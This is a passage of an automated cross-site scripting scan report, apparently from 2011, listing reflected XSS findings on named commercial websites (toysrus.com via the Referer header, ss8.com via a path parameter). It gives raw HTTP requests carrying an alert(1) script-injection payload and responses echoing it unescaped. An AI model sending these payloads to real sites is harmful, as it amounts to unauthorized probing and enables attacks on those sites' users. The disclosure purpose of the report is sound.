Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.toysrus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dd36c"><script>alert(1)</script>2d1a52ce099

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:02:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=8QVvTWFPpBBbzpCxbqtwmy4JzBQTMhfcjzs79T8nHpVgpCJdm4mb!1626367435; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 94916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1284386;type=trupa912;cat=truho083;u1=;u2=1;u3=;u4=2255956;u5=dd36c"><script>alert(1)</script>2d1a52ce099;ord=1;num=35888678?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.30. http://www.ss8.com/account.php [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ss8.com
Path:   /account.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfc28"><script>alert(1)</script>3a7ddddcd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /account.php/bfc28"><script>alert(1)</script>3a7ddddcd4 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 13 Oct 2011 11:04:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ss8.comlogin.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 16791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <ti
...[SNIP]...
<form id="NewUser" action="/account.php/bfc28"><script>alert(1)</script>3a7ddddcd4" method="post" autocomplete="off">
...[SNIP]...

Report generated by XSS.CX at Thu Oct 13 06:51:09 CDT 2011.